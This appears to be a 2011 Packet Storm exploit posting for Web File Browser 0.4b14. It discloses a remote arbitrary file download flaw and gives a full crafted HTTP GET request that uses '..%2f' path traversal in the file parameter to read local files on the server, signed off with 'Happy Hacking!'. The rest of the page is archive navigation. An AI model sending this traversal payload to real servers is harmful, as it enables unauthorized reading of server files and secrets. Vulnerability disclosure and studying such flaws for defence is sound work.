exploit the possibilities

Web File Browser 0.4b14 File Download

Web File Browser 0.4b14 File Download
Posted Nov 3, 2011
Authored by Sangyun YOO

Web File Browser version 0.4b14 suffers from a remote file download vulnerability.

tags | exploit, remote, web
MD5 | 70ad7f078363e5c3d9a6126ab6b88bd0

Web File Browser 0.4b14 File Download

Change Mirror Download
Exploit Title: [Web File Browser 0.4b14 File Download Vulnerability]
# Date: [2011/11/03]
# Author: [Sangyun YOO]
# Email: yoosy0302 at naver dot com
# Software Link: [ http://downloads.sourceforge.net/project/webfilebrowser/webfilebrowser/0.4b14/webfilebrowser-0.4b14.zip ]
# Version: [Web File Browser 0.4b14]
# Tested on: [Windows 7 Starter K]
---------------------------------------

Using Paros Tool Request Message to the modulation of the Request Line ==>

GET http://192.168.0.189/webFileBrowser.php?act=download&subdir=&sortby=name&file=..%2f..%2f..%2f..%2f..%2f[localfile] HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/msword, */*
Accept-Language: ko
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 192.168.0.189
Cookie: user=admin; loginkey=8d28703726be663cd5afb551bbb78be4; AJXP_LAST_KNOWN_VERSION=3.2.4; mx64B616EE8DEC99D3BFE053EAB04DC8=fcf2ad987a6db7670d4510ff9fa82a66; mx1B5F4F6EE7FC1C64773320E0BBE578=fe7c641b1a977587b5b6e0d355072a84; tab_usersconfig=0


===== Happy Hacking! =====

Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    14 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close